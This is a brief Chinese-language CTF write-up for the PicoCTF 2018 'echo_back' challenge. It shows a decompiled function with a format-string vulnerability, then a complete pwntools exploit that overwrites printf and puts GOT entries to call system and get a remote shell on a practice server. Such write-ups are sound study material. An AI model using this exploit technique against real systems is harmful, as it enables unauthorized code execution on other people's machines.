PicoCTF_2018_echo_back
保护检查
源码分析
主要看vuln函数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| unsigned int vuln()
{
char buf[128]; // [esp+Ch] [ebp-8Ch] BYREF
unsigned int v2; // [esp+8Ch] [ebp-Ch]
v2 = __readgsdword(0x14u);
memset(buf, 0, sizeof(buf));
system("echo input your message:");
read(0, buf, 0x7Fu);
printf(buf);
puts("\n");
puts("Thanks for sending the message!");
return __readgsdword(0x14u) ^ v2;
}
|
存在格式化字符串漏洞
思路:因为got表是可写的,并且程序中存在system函数,首先把printf_got中的数据改成system_plt,为了能够再次回到函数,就要改写puts_got为vuln函数的地址,第二次输入/bin/sh就可以成功拿到shell
exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
| from pwn import *
context(os='linux',arch='i386',log_level='debug')
#p = process("./buu")
p = remote('node4.buuoj.cn',25113)
sh = "sh\x00\x00"
num = u32(sh)
printf_got = 0x804A010
system_plt = 0x8048460
puts_got = 0x804A01C
vuln = 0x80485AB
payload = p32(printf_got)
payload += p32(printf_got + 1)
payload += p32(printf_got + 2)
payload += p32(printf_got + 3)
payload += p32(puts_got)
payload += p32(puts_got + 1)
payload += p32(puts_got + 2)
payload += p32(puts_got + 3)
payload += "%64c%7$hhn"
payload += "%36c%8$hhn"
payload += "%128c%9$hhn"
payload += "%4c%10$hhn"
payload += "%163c%11$hhn"
payload += "%218c%12$hhn"
payload += "%127c%13$hhn"
payload += "%4c%14$hhn"
p.sendline(payload)
p.recv()
payload = "/bin/sh\x00"
p.sendline(payload)
p.interactive()
|
